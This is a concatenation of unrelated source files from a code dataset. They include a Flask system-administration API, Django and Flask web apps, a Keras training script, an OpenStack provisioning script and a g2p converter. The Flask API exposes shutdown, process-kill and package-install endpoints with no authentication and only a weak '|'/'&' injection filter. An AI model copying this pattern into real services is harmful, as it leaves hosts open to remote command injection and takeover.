response.get_json()\n\n\n@app.route(\"/api/ram\")\ndef api_ram():\n response = apiresponse.APIResponse()\n response.insert_value(\"Value\", resources.get_ram_usage_percent())\n return response.get_json()\n\n\n@app.route(\"/api/users/\")\ndef api_get_user(user):\n return {user: users.get_user_groups(user)}\n\n\n@app.route(\"/api/users\")\ndef get_user_list():\n user_list = users.get_users()\n # return { \"users\" : json.dumps(user_list) }\n return json.dumps(user_list)\n\n\n@app.route(\"/api/process\")\ndef api_process_list():\n return json.dumps(resources.get_process_list())\n\n\n@app.route(\"/api/stop_process\", methods=['POST'])\ndef api_stop_process():\n content = request.json\n response = apiresponse.APIResponse()\n process_name = content[\"name\"][\"s\"]\n if \"|\" in process_name or \"&\" in process_name:\n response.insert_value(\"Status\", \"Error\")\n return response.get_json(),400\n\n if process.delete_process(str(process_name)):\n response.insert_value(\"Status\", \"OK\")\n return response.get_json()\n else:\n response.insert_value(\"Status\", \"Error\")\n return response.get_json(),400\n\n\n\n@app.route(\"/api/cpu\")\ndef api_get_cpu():\n response = apiresponse.APIResponse()\n response.insert_value(\"Value\", resources.get_cpu_usage())\n return response.get_json()\n\n\n@app.route(\"/api/package/install\", methods=[\"POST\"])\ndef api_install_package():\n content = request.json\n\n response = apiresponse.APIResponse()\n\n package_name = content[\"name\"]\n pkgManager = packages.PackageManager(\"yum\")\n if \"|\" in package_name or \"&\" in package_name:\n response.insert_value(\"Status\", \"Error\")\n return response.get_json(), 400\n\n if pkgManager.install(package_name):\n response.insert_value(\"Status\", \"OK\")\n return response.get_json(), 200\n else:\n response.insert_value(\"Status\", \"Erorr\")\n return response.get_json(), 400\n\n\n@app.route(\"/api/package/delete\", methods=[\"POST\"])\ndef api_delete_package():\n content = request.json\n response = apiresponse.APIResponse()\n\n package_name = content[\"name\"]['s']\n print(package_name)\n pkgManager = packages.PackageManager(\"yum\")\n\n if pkgManager.remove(package_name):\n response.insert_value(\"Status\", \"OK\")\n return response.get_json(), 200\n else:\n response.insert_value(\"Status\", \"Error\")\n return response.get_json(), 400\n\n@app.route(\"/api/package/status\")\ndef api_package_status():\n response = apiresponse.APIResponse()\n if resources.apt_locked() == b'FREE':\n 
response.insert_value(\"Status\",\"Free\")\n return response.get_json(),200\n else:\n response.insert_value(\"Status\",\"Locked\")\n return response.get_json(),200\n\n\n@app.route(\"/api/battery\")\ndef api_battery():\n response = apiresponse.APIResponse()\n response.insert_value(\"Plug\", resources.get_battery_plugged())\n response.insert_value(\"Value\", resources.get_battery_percentage())\n return response.get_json(), 200\n\n\n@app.route(\"/api/shutdown\")\ndef api_shutdown():\n response = apiresponse.APIResponse()\n response.insert_value(\"Value\", \"Ok\")\n actions.shutdown()\n return response.get_json(), 200\n\n\n@app.route(\"/api/disk\")\ndef api_disk():\n response = apiresponse.APIResponse()\n response.insert_value(\"Value\", resources.get_disk_space())\n return response.get_json(), 200\n\n@app.route(\"/api/disk_folders\")\ndef api_disk_folders():\n return json.dumps(resources.get_disk_folders()),200\n\n@app.route(\"/api/ram/process\")\ndef api_ram_process():\n return json.dumps(resources.get_process_list_with_usage()),200\n\n@app.route(\"/api/package/list\")\ndef api_package_list():\n return json.dumps(resources.installed_packages()),200\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"LEA/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83739855","text":"class Employee:\n no_of_employee = 10\n\n def __init__(self, name, age, dept):\n self.name = name\n self.age = age\n self.dept = dept\n\n\n @classmethod\n def from_dash(cls, string):\n return cls(*string.split('-'))\n\n @staticmethod\n def validateName(string):\n if string.isalpha():\n return True\n return False\n\n\n def printDetail(self):\n return f\"Hello my name is {self.name}, age is {self.age} and working in {self.dept} department\"\n\n\nclass Player:\n\n def __init__(self, name,age,game):\n self.name = name\n self.age = age\n self.game = game\n self.var1 = \"Player2\"\n\n def printDetail(self):\n return f\"Hello my name is {self.name}, age is {self.age} and playing {self.game} games\"\n\n\nclass CoolProgrammer(Player, Employee):\n var1 = \"Name\"\n\n\nif __name__ == '__main__':\n s1 = Employee.from_dash(\"Ashish-24-PD\")\n s2 = Employee(\"Ankur\", \"24\", \"PD\")\n print(s1.validateName(s1.name))\n s3 = CoolProgrammer(\"Ankur\", \"24\", [\"Cricket\", \"Hockey\", \"Badminton\"])\n print(s3.printDetail())\n print(s3.var1)\n","sub_path":"multipleInheritance.py","file_name":"multipleInheritance.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"88611749","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n###########################################################################\n#\n# convert_xml.py\n#\n# This takes an XML file with xml:lang attributes and text in\n# some orthography, and converts it to use English ARPABET symbols\n# for speech processing. (Provided, of course, that a conversion\n# pipeline for it is available through the G2P library.)\n# This XML file preserves complex markup, even within words\n# (e.g. even if you have morpheme tags within words, it\n# can perform phonological rules across those tags).\n#\n# Language attributes can be added at any level, even below the level of\n# the word. Like say I need to convert \"Patrickƛən\" (my name is Patrick)\n# in Kwak'wala; neither an English nor Kwak'wala pipeline could appropriately\n# convert this word. 
I can mark that up as:\n#\n# Patrickƛən\n#\n# to send the first part to the English conversion pipeline and the\n# second part to the Kwak'wala pipeline.\n#\n# The only assumption made by this module about the structure of the XML\n# is that it has word tags (using , the convention used by TEI formats.)\n# The reason for this is that the word is the domain over which phonological\n# rules apply, and we particularly need to know it to be able to perform\n# phonological rules at word boundaries. We also only convert text that\n# is part of words (i.e. we don't bother sending whitespace or punctuation\n# through the G2P).\n#\n# So, if the XML file doesn't have word elements, tokenize it and add them.\n#\n# TODO: Document functions\n############################################################################\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport argparse\nimport copy\nimport os\nimport unicodedata as ud\n\nimport text_unidecode\nfrom g2p import make_g2p\nfrom g2p.mappings.langs.utils import is_arpabet\nfrom g2p.transducer import CompositeTransductionGraph, TransductionGraph\n\nfrom readalongs.log import LOGGER\nfrom readalongs.text.lexicon_g2p import getLexiconG2P\nfrom readalongs.text.lexicon_g2p_mappings import __file__ as LEXICON_PATH\nfrom readalongs.text.util import (\n get_lang_attrib,\n load_xml,\n save_xml,\n unicode_normalize_xml,\n)\n\n\ndef convert_word(word: str, lang: str, output_orthography: str, verbose_warnings: bool):\n if lang == \"eng\":\n # Hack to use old English LexiconG2P\n # Note: adding eng_ prefix to vars that are used in both blocks to make mypy\n # happy. Since the two sides of the if and in the same scope, it complains about\n # type checking otherwise.\n assert output_orthography == \"eng-arpabet\"\n eng_tg = False\n eng_converter = getLexiconG2P(\n os.path.join(os.path.dirname(LEXICON_PATH), \"cmu_sphinx.metadata.json\")\n )\n try:\n eng_text, eng_indices = eng_converter.convert(word)\n eng_valid = is_arpabet(eng_text)\n except KeyError as e:\n if verbose_warnings:\n LOGGER.warning(f'Could not g2p \"{word}\" as English: {e.args[0]}')\n eng_text = word\n eng_indices = []\n eng_valid = False\n return eng_converter, eng_tg, eng_text, eng_indices, eng_valid\n else:\n if lang == \"und\":\n # First, we apply unidecode to map characters all all known alphabets in the\n # Unicode standard to their English representation, then we use g2p.\n text_to_g2p = text_unidecode.unidecode(word)\n else:\n text_to_g2p = word\n\n converter = make_g2p(lang, output_orthography)\n tg = converter(text_to_g2p)\n text = tg.output_string.strip()\n indices = tg.edges\n valid = converter.check(tg, shallow=True)\n if not valid and verbose_warnings:\n converter.check(tg, shallow=False, display_warnings=verbose_warnings)\n\n if lang == \"und\":\n # for now, we don't handle indices through unidecode, so overwrite the indices\n # converter returneed by just beginning-end index pairs\n # TODO: instead of this hack, prepend the indices from word to text_to_g2p to\n # indices.\n indices = [(0, 0), (len(word), len(text))]\n tg = None\n\n return converter, tg, text, indices, valid\n\n\ndef convert_words(\n xml,\n word_unit=\"w\",\n output_orthography=\"eng-arpabet\",\n g2p_fallbacks=[],\n verbose_warnings=False,\n):\n all_g2p_valid = True\n for word in xml.xpath(\".//\" + word_unit):\n # if the word was already g2p'd, skip and keep existing ARPABET representation\n if \"ARPABET\" in word.attrib:\n arpabet = word.attrib[\"ARPABET\"]\n if not 
is_arpabet(arpabet):\n LOGGER.warning(\n f'Pre-g2p\\'d text \"{word.text}\" has invalid ARPABET conversion \"{arpabet}\"'\n )\n all_g2p_valid = False\n continue\n # only convert text within words\n if not word.text:\n continue\n g2p_lang = (\n get_lang_attrib(word) or \"und\"\n ) # default to Undetermined if lang missing\n text_to_g2p = word.text\n converter, tg, g2p_text, indices, valid = convert_word(\n text_to_g2p, g2p_lang, output_orthography, verbose_warnings\n )\n if not valid:\n # This is where we apply the g2p cascade\n for lang in g2p_fallbacks:\n LOGGER.warning(\n f'Could not g2p \"{text_to_g2p}\" as {g2p_lang}. Trying fallback: {lang}.'\n )\n g2p_lang = lang\n converter, tg, g2p_text, indices, valid = convert_word(\n text_to_g2p, g2p_lang, output_orthography, verbose_warnings\n )\n if valid:\n word.attrib[\"effective_g2p_lang\"] = g2p_lang\n break\n else:\n all_g2p_valid = False\n LOGGER.warning(\n f'No valid g2p conversion found for \"{text_to_g2p}\". '\n f\"Check its orthography and language code, \"\n f\"or pick suitable g2p fallback languages.\"\n )\n\n word.attrib[\"ARPABET\"] = g2p_text\n\n return xml, all_g2p_valid\n\n\ndef convert_xml(\n xml,\n word_unit=\"w\",\n output_orthography=\"eng-arpabet\",\n g2p_fallbacks=[],\n verbose_warnings=False,\n):\n xml_copy = copy.deepcopy(xml)\n xml_copy, valid = convert_words(\n xml_copy, word_unit, output_orthography, g2p_fallbacks, verbose_warnings\n )\n return xml_copy, valid\n\n\ndef go(\n input_filename, output_filename, word_unit=\"w\", output_orthography=\"eng-arpabet\"\n):\n xml = load_xml(input_filename)\n converted_xml = convert_xml(xml, word_unit, output_orthography)\n save_xml(output_filename, converted_xml)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Convert XML to another orthography while preserving tags\"\n )\n parser.add_argument(\"input\", type=str, help=\"Input XML\")\n parser.add_argument(\"output\", type=str, help=\"Output XML\")\n parser.add_argument(\n \"--word_unit\",\n type=str,\n default=\"w\",\n help=\"XML element that \" 'represents a word (default: \"w\")',\n )\n parser.add_argument(\n \"--out_orth\",\n type=str,\n default=\"eng-arpabet\",\n help='Output orthography (default: \"eng-arpabet\")',\n )\n args = parser.parse_args()\n go(args.input, args.output, args.word_unit, args.out_orth)\n","sub_path":"readalongs/text/convert_xml.py","file_name":"convert_xml.py","file_ext":"py","file_size_in_byte":7571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306708733","text":"# _*_coding:utf-8 _*_\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom .forms import AddForm\n\nbd = {'timo':19930101,'ud':19940101}\ndef getDate(request):\n if request.method == 'POST':\n\n form = AddForm(request.POST)\n\n if form.is_valid():\n a = form.cleaned_data['a']\n b = form.cleaned_data['b']\n bd[a] = b\n return HttpResponse(\"保存成功\")\n\n else:\n form = AddForm()\n return render(request, 'getDate.html',{'form':form})\n\ndef index(request):\n return render(request, 'index.html',{'bd':bd})\n\n\n\n\n# def index(request):\n# birthday = {'a':'19930101','b':'19920101','c':'19910101'}\n# return render(request, 'index.html',{'birthday':birthday})\n\n# def index(request):\n# return render(request, 'getDate.html')\n#\n# def add(request):\n# a = request.GET['a']\n# b = request.GET['b']\n# a = int(a)\n# b = int(b)\n# return HttpResponse(str(a + b))\n\n# def people(request):\n# name = request.GET['姓名: ']\n# birthday 
= request.GET['生日: ']\n# a = int(name)\n# b = int(birthday)\n","sub_path":"birthday_memo/birthdayDate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"28438538","text":"import numpy as np\nimport pandas as pd\nimport sys\nimport os\nfrom keras import backend as K\nfrom keras.optimizers import SGD\nfrom skimage.io import imread\nfrom matplotlib import pyplot as plt\nimport time\nfrom architecture_flexible import set_architecture\n\nos.environ['KERAS_BACKEND'] = 'theano'\nos.environ['THEANO_FLAGS'] = 'mode=FAST_RUN, device=gpu0, floatX=float32, optimizer=fast_compile'\n\ndef label_map(labels):\n label_map = np.zeros([img_h, img_w, n_labels]) \n for r in range(img_h):\n for c in range(img_w):\n label_map[r, c, labels[r][c]] = 1\n return label_map\n\ndef prep_data(mode):\n assert mode in {'test', 'train'}, \\\n 'mode should be either \\'test\\' or \\'train\\''\n data = []\n label = []\n df = pd.read_csv(path + mode + '.csv')\n n = n_train if mode == 'train' else n_test\n for i, item in df.iterrows():\n if i >= n:\n break\n img, gt = [imread(path + item[0])], np.clip(imread(path + item[1]), 0, 1)\n data.append(img)\n label.append(label_map(gt))\n sys.stdout.write('\\r')\n sys.stdout.write(mode + \": [%-20s] %d%%\" % ('=' * int(20. * (i + 1) / n - 1) + '>',\n int(100. * (i + 1) / n)))\n sys.stdout.flush()\n sys.stdout.write('\\r')\n sys.stdout.flush()\n data, label = np.array(data), np.array(label).reshape((n, img_h * img_w, n_labels))\n\n print(mode + ': OK')\n print('\\tshapes: {}, {}'.format(data.shape, label.shape))\n print('\\ttypes: {}, {}'.format(data.dtype, label.dtype))\n print('\\tmemory: {}, {} MB'.format(data.nbytes / 1048576, label.nbytes / 1048576))\n\n return data, label\n\n\ndef plot_results(output, fname):\n gt = []\n df = pd.read_csv(path + 'test.csv')\n for i, item in df.iterrows():\n gt.append(np.clip(imread(path + item[1]), 0, 1))\n\n plt.figure(figsize=(15, 2 * n_test))\n for i, item in df.iterrows():\n plt.subplot(n_test, 4, 4 * i + 1)\n plt.title('Ground Truth')\n plt.axis('off')\n gt = imread(path + item[1])\n plt.imshow(np.clip(gt, 0, 1))\n\n plt.subplot(n_test, 4, 4 * i + 2)\n plt.title('Prediction')\n plt.axis('off')\n labeled = np.argmax(output[i], axis=-1)\n plt.imshow(labeled)\n\n plt.subplot(n_test, 4, 4 * i + 3)\n plt.title('Heat map')\n plt.axis('off')\n plt.imshow(output[i][:, :, 1])\n\n plt.subplot(n_test, 4, 4 * i + 4)\n plt.title('Comparison')\n plt.axis('off')\n rgb = np.empty((img_h, img_w, 3))\n rgb[:, :, 0] = labeled\n rgb[:, :, 1] = imread(path + item[0])\n rgb[:, :, 2] = gt\n plt.imshow(rgb)\n\n plt.savefig(fname)\n plt.close()\n\n\nif __name__ == '__main__':\n # inputs \n path = 'Data/' # path to data\n img_channels = 1 # img channels\n img_w = 256 # img width (pixels)\n img_h = 256 # img height (pixels)\n n_labels = 2 # number of labels\n n_train = 6 # number of samples in train set\n n_test = 3 # number of samples in test set\n n_epochs = 50 # number of epochs to train\n batch_size = 1 # batch size\n \n\n\n\n # read in data \n train_data, train_label = prep_data('train')\n test_data, test_label = prep_data('test')\n\n #if K.image_dim_ordering() == 'th':\n # X = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\n # X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n # input_shape = (1, img_rows, img_cols)\n #else:\n # X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\n # X_test = 
X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\n # input_shape = (img_rows, img_cols, 1)\n\n input_shape = (img_channels, img_h, img_w) # channels first\n layers_in_block = [1, 2, 3, 4] \n for l in layers_in_block:\n print(\"Layers in block: {0}\".format(l))\n model = set_architecture(n_labels, input_shape, conv_layers_in_block=l)\n #optimizer = SGD(lr=0.001, momentum=0.9, decay=0.0005, nesterov=False)\n model.compile(loss=\"categorical_crossentropy\", optimizer='adam', metrics=['accuracy'])\n print('Compiled')\n t0 = time.time()\n history = model.fit(train_data, train_label, batch_size=batch_size, epochs=n_epochs,\n validation_data = (test_data, test_label), verbose=1) \n t1 = time.time()\n elapsed = int(round(t1-t0, 0))\n #model.save_weights('weights.hdf5')\n #model.load_weights('model_5l_weight_ep50.hdf5')\n\n score = model.evaluate(test_data, test_label, verbose=0)\n loss = round(score[0], 3)\n accuracy = round(score[1], 3)\n print(\"Test loss: {0}\".format(loss))\n print(\"Test accuracy: {0}\".format(accuracy))\n print(\"Computation time: {0}\".format(elapsed))\n output = model.predict(test_data, verbose=0)\n output = output.reshape((output.shape[0], img_h, img_w, n_labels))\n fname = \"L-\" + str(l) + \"__t-\" + str(elapsed) + \"s__l-\" + str(loss) + \"__ac-\" + str(accuracy) + \"_.png\"\n plot_results(output, fname)\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"589966087","text":"from datetime import datetime as dt\n\nfrom web_app import app\nfrom web_app import db\nfrom flask import render_template, redirect, url_for, flash, get_flashed_messages\nimport datetime as dt\nimport uuid\nimport sys\n\nimport forms\nfrom models import Task, CrewMember, Crew\n\n\ndef console_out(msg):\n \"\"\" output to console \"\"\"\n print(msg, file=sys.stderr)\n return\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n # return 'Hello Bernard'\n tasks = Task.query.all()\n return render_template('index.html', list_name='Ze_List', tasks=tasks)\n\n\n@app.route('/watch')\ndef watch():\n watch_list = [\n {'number': 1, 'crew_1': 'B', 'crew_2': 'D'},\n {'number': 2, 'crew_1': 'S', 'crew_2': 'E'}\n ]\n return render_template('watch_list.html', list_name=\"Watches\", watch_list=watch_list)\n\n\n@app.route('/param')\ndef save_param():\n crew_id = str(uuid.uuid1()) # shared by all crew members\n crew_list = [{'name': 'B', 'is_skipper': False}, {'name': 'D', 'is_skipper': False},\n {'name': 'E', 'is_skipper': False}, {'name': 'S', 'is_skipper': True}]\n for crw in crew_list:\n console_out(f'crw: {crw}')\n cm = CrewMember(name=crw['name'], is_skipper=crw['is_skipper'], crew_id=crew_id)\n db.session.add(cm)\n # db.session.commit()\n param = dict(start_date=dt.datetime(2022, 5, 15), end_date=dt.datetime(2022, 6, 30), watch_duration=4,\n crew_id=crew_id)\n cr = Crew(**param)\n db.session.add(cr)\n db.session.commit()\n\n # Read the data back from the DB\n out_param = Crew.query.filter_by(crew_id=crew_id).first()\n console_out(f'DB Result: {out_param}')\n console_out(f'DB Result crew_ID: {out_param.crew_id}')\n crew_list = CrewMember.query.filter_by(crew_id=crew_id).all()\n console_out(f'Crew_List: {crew_list}')\n return render_template('crew_list.html', crew_id=crew_id, param=out_param, crew_list=crew_list)\n\n\n\n@app.route('/add', methods=['GET', 'POST'])\ndef add():\n form = forms.AddTaskForm()\n if form.validate_on_submit():\n t = 
Task(title=form.title.data, date=dt.utcnow())\n db.session.add(t)\n db.session.commit()\n # print(f'Submitted title: {form.title.data}')\n flash(f\"Task {form.title.data} added to Database\")\n # return render_template('about.html', form=form, title=form.title.data)\n return (redirect(url_for('index')))\n return render_template('add.html', form=form)\n\n\n# @app.route('/edit/')\n@app.route('/edit/', methods=['GET', 'POST'])\ndef edit(task_id):\n task = Task.query.get(task_id)\n # print(task)\n if task:\n form = forms.AddTaskForm()\n if form.validate_on_submit():\n task.title = form.title.data\n task.date = dt.utcnow()\n db.session.commit()\n flash('Task has been updated')\n return redirect(url_for('index'))\n else:\n form.title.data = task.title\n return render_template('edit.html', form=form, task_id=task_id)\n else:\n flash('Task not found')\n return redirect(url_for('index'))\n\n\n@app.route('/delete/', methods=['GET', 'POST'])\ndef delete(task_id):\n task = Task.query.get(task_id)\n # print(task)\n if task:\n form = forms.DeleteTaskForm()\n if form.validate_on_submit():\n db.session.delete(task)\n db.session.commit()\n flash('Task has been deleted')\n return redirect(url_for('index'))\n else:\n return render_template('delete.html', form=form, task_id=task_id, title=task.title)\n else:\n flash('Task not found')\n return redirect(url_for('index'))\n\n#\n# @app.route('/basic')\n# def basic():\n# print('basic')\n# return render_template('basic.html')\n","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"175127269","text":"#!/usr/bin/env python\nimport os\nimport time\nimport subprocess\nfrom neutronclient.v2_0 import client\nfrom novaclient.client import Client\n\ndef get_neutron_credentials():\n d = {}\n d['username'] = os.environ['OS_USERNAME']\n d['password'] = os.environ['OS_PASSWORD']\n d['auth_url'] = os.environ['OS_AUTH_URL']\n d['tenant_name'] = os.environ['OS_TENANT_NAME']\n return d\n\ndef get_nova_credentials_v2():\n d = {}\n d['version'] = '2'\n d['username'] = os.environ['OS_USERNAME']\n d['api_key'] = os.environ['OS_PASSWORD']\n d['auth_url'] = os.environ['OS_AUTH_URL']\n d['project_id'] = os.environ['OS_TENANT_NAME']\n return d\n\ndef print_values(val, type):\n if type == 'ports':\n val_list = val['ports']\n if type == 'networks':\n val_list = val['networks']\n if type == 'routers':\n val_list = val['routers']\n for p in val_list:\n for k, v in p.items():\n print(\"%s : %s\" % (k, v))\n print('\\n')\n\ndef print_values_server(val, server_id, type):\n if type == 'ports':\n val_list = val['ports']\n \n if type == 'networks':\n val_list = val['networks']\n for p in val_list:\n bool = False\n for k, v in p.items():\n if k == 'device_id' and v == server_id:\n bool = True\n if bool:\n for k, v in p.items():\n print(\"%s : %s\" % (k, v))\n print('\\n')\n\nOoB_network_name = 'OoB-mngt-net'\nTenant_network_name = 'Tenant-mngt-net'\n\nneutron_credentials = get_neutron_credentials()\nneutron = client.Client(**neutron_credentials)\n\nnova_credentials = get_nova_credentials_v2() \nnova = Client(**nova_credentials)\n\ntry:\n# Create OoB network\n body_create_OoB = {'network': {'name': OoB_network_name,\n 'admin_state_up': True}}\n \n net_oob = neutron.create_network(body=body_create_OoB)\n oob_dict = net_oob['network']\n oob_id = oob_dict['id']\n print('Network %s created' % oob_id)\n\n# Create OoB subnet\n body_create_subnet_oob = {'subnets': 
[{'cidr': '10.0.0.0/24',\n 'ip_version': 4, 'network_id': oob_id}]}\n \n subnet_oob = neutron.create_subnet(body=body_create_subnet_oob)\n print('Created subnet %s' % subnet_oob)\n\n# Create Tenant mgnt network\n body_create_Tenant = {'network': {'name': Tenant_network_name,\n 'admin_state_up': True}}\n\n net_tnt = neutron.create_network(body=body_create_Tenant)\n tnt_dict = net_tnt['network']\n tnt_id = tnt_dict['id']\n print('Network %s created' % tnt_id)\n\n# Create Tenant mngt subnet\n body_create_subnet_tnt = {'subnets': [{'cidr': '10.1.0.0/24',\n 'ip_version': 4, 'network_id': tnt_id}]}\n\n subnet_tnt = neutron.create_subnet(body=body_create_subnet_tnt)\n print('Created subnet %s' % subnet_tnt)\n\n# Create a router\n\n neutron.format = 'json'\n request = {'router': {'name': 'router1',\n 'admin_state_up': True}}\n \n router = neutron.create_router(request)\n router_id = router['router']['id']\n\n networks = neutron.list_networks(name='public')\n ext_net_id = networks['networks'][0]['id']\n\n# Set gateway\n subprocess.call([\"neutron\",\"router-gateway-set\",router_id,ext_net_id]) \n router = neutron.show_router(router_id)\n print(router)\n\n suboob_dict = subnet_oob['subnets']\n suboob_id = suboob_dict[0]['network_id']\n\n# Add a port to the oob subnet\n body_oob = {'port': {\n 'admin_state_up': True,\n 'device_id': router_id,\n 'name': 'port1',\n 'network_id': suboob_id,\n }}\n \n response = neutron.create_port(body=body_oob)\n print(response)\n\n subtnt_dict = subnet_tnt['subnets']\n subtnt_id = subtnt_dict[0]['network_id']\n\n# Add a port to the tenant mngt subnet\n body_tnt = {'port': {\n 'admin_state_up': True,\n 'device_id': router_id,\n 'name': 'port2',\n 'network_id': subtnt_id,\n }}\n\n response = neutron.create_port(body=body_tnt)\n print(response)\n\n# Spin up an instance connected to both our networks\n image = nova_client.images.find(name=\"ACI_Simulator.iso\")\n flavor = nova_client.flavors.find(name=\"m1.xlarge\")\n\n nics = [{'net-id': oob_id},{'net-id': tnt_id} ]\n instance = nova_client.servers.create(name=\"ACISimulator\", image=image,flavor=flavor, key_name=\"ACI-keypair\", nics=nics)\n\n# Set up floating IPs and associate\n floating_ip = nova.floating_ips.create()\n instance.add_floating_ip(floating_ip)\n\nfinally:\n print(\"Execution completed\")\n","sub_path":"devstack-environment/devstack-environment/playbooks/files/temp/create_ACI_environ.py","file_name":"create_ACI_environ.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"66857230","text":"from gui_boxes import *\nfrom mapEditor import *\n\nclass NewBox(Box):\n def __init__(self,x,y,w,h,parent):\n super().__init__(x,y,w,h,parent)\n self._graphic = pg.image.load('../gfx/new.png').convert_alpha()\n self._graphic_rect = pg.Rect(self._x+146,self._y+96,64,64)\n self._text_rect = pg.Rect(self._x+40,self._y+40,self._width,self._height)\n\n def mouseUp(self):\n if self.mouseInside():\n program = self._parent.getProgram()\n program.setActiveElement(mapEditor(program))\n \n def draw(self):\n pg.draw.rect(SCREEN,self._box_colour,self._box)\n text = FONT.render(\"New Level\",True,self._text_colour)\n SCREEN.blit(text,self._text_rect)\n SCREEN.blit(self._graphic,self._graphic_rect)\n pg.draw.rect(SCREEN,BLACK,self._box,1)","sub_path":"levelEditor/new_box.py","file_name":"new_box.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
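# Editor's note on create_ACI_environ.py above: the instance boot step references
# nova_client although the client object created earlier is named nova, so the script
# raises NameError as written. A sketch of that step with a consistent name, using
# only calls that already appear in the record:
#
#     image = nova.images.find(name="ACI_Simulator.iso")
#     flavor = nova.flavors.find(name="m1.xlarge")
#     nics = [{'net-id': oob_id}, {'net-id': tnt_id}]
#     instance = nova.servers.create(name="ACISimulator", image=image, flavor=flavor,
#                                    key_name="ACI-keypair", nics=nics)
#     floating_ip = nova.floating_ips.create()
#     instance.add_floating_ip(floating_ip)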
+{"seq_id":"543376635","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('conversationmanager', '0009_auto_20150629_2145'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Conversationoptiongraph',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Dialogs',\n fields=[\n ('dialog', models.IntegerField(verbose_name='dialog ID', serialize=False, primary_key=True)),\n ('dialog_text', models.TextField()),\n ('conversationID', models.ForeignKey(to='conversationmanager.Conversation')),\n ],\n options={\n 'ordering': ['dialog'],\n },\n ),\n migrations.CreateModel(\n name='Options',\n fields=[\n ('optionID', models.IntegerField(serialize=False, primary_key=True)),\n ('option_text', models.CharField(unique=True, max_length=255)),\n ],\n options={\n 'ordering': ['optionID'],\n },\n ),\n migrations.CreateModel(\n name='Userconversation',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('conversationID', models.IntegerField()),\n ('conversation_time', models.DateTimeField()),\n ('conversation', models.ForeignKey(to='conversationmanager.Dialogs')),\n ('option_selected', models.ForeignKey(to='conversationmanager.Options')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-conversation_time', 'user'],\n },\n ),\n migrations.AddField(\n model_name='dialogs',\n name='option',\n field=models.ManyToManyField(to='conversationmanager.Options', through='conversationmanager.Conversationoptiongraph'),\n ),\n migrations.AddField(\n model_name='dialogs',\n name='user_conversation',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='conversationmanager.Userconversation'),\n ),\n migrations.AddField(\n model_name='conversationoptiongraph',\n name='current_dialog',\n field=models.ForeignKey(to='conversationmanager.Dialogs'),\n ),\n migrations.AddField(\n model_name='conversationoptiongraph',\n name='next_dialog',\n field=models.ForeignKey(null=True, related_name='next_conversation', to='conversationmanager.Dialogs', blank=True),\n ),\n migrations.AddField(\n model_name='conversationoptiongraph',\n name='option',\n field=models.ForeignKey(to='conversationmanager.Options'),\n ),\n ]\n","sub_path":"conversationmanager/migrations/0010_auto_20150629_2150.py","file_name":"0010_auto_20150629_2150.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"592033229","text":"import pandas as pd\nimport numpy as np\n\nclass OLS:\n ''' Also known as linear regression. '''\n def __init__(self, trainDf, testDf):\n self.trainDf = trainDf\n self.testDf = testDf\n \n def format(self, dataframe):\n ''' Organize the format to use the statsmodel library. 
'''\n        df = dataframe.reset_index()\n        # Convert datetimes to timestamps\n        df['index'] = df['index'].astype(int).astype(float)\n        # Put to a human scale\n        df['index'] = df['index'].apply(lambda x: x / 1e18)\n        return df\n\n    def fit(self):\n        df = self.format(self.trainDf)\n        x = df['index']\n        y = df['count']\n        cov = np.cov(x, y)[0, 1]\n        # np.cov normalizes by N - 1 by default, so match it with ddof=1\n        varx = np.var(x, ddof=1)\n        self.a = cov / varx\n        self.b = np.mean(y) - np.mean(x) * self.a\n\n    def predict(self):\n        df = self.format(self.testDf)\n        predictions = [self.a * x + self.b for x in df['index']]\n        return predictions","sub_path":"lib/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"567272838","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n15 Apr 2014\n\n@author: Cristina De Saint Germain\n\"\"\"\n\nimport rospy\nimport smach\n\nfrom operator import attrgetter\nfrom object_grasping_states.detect_object_sm 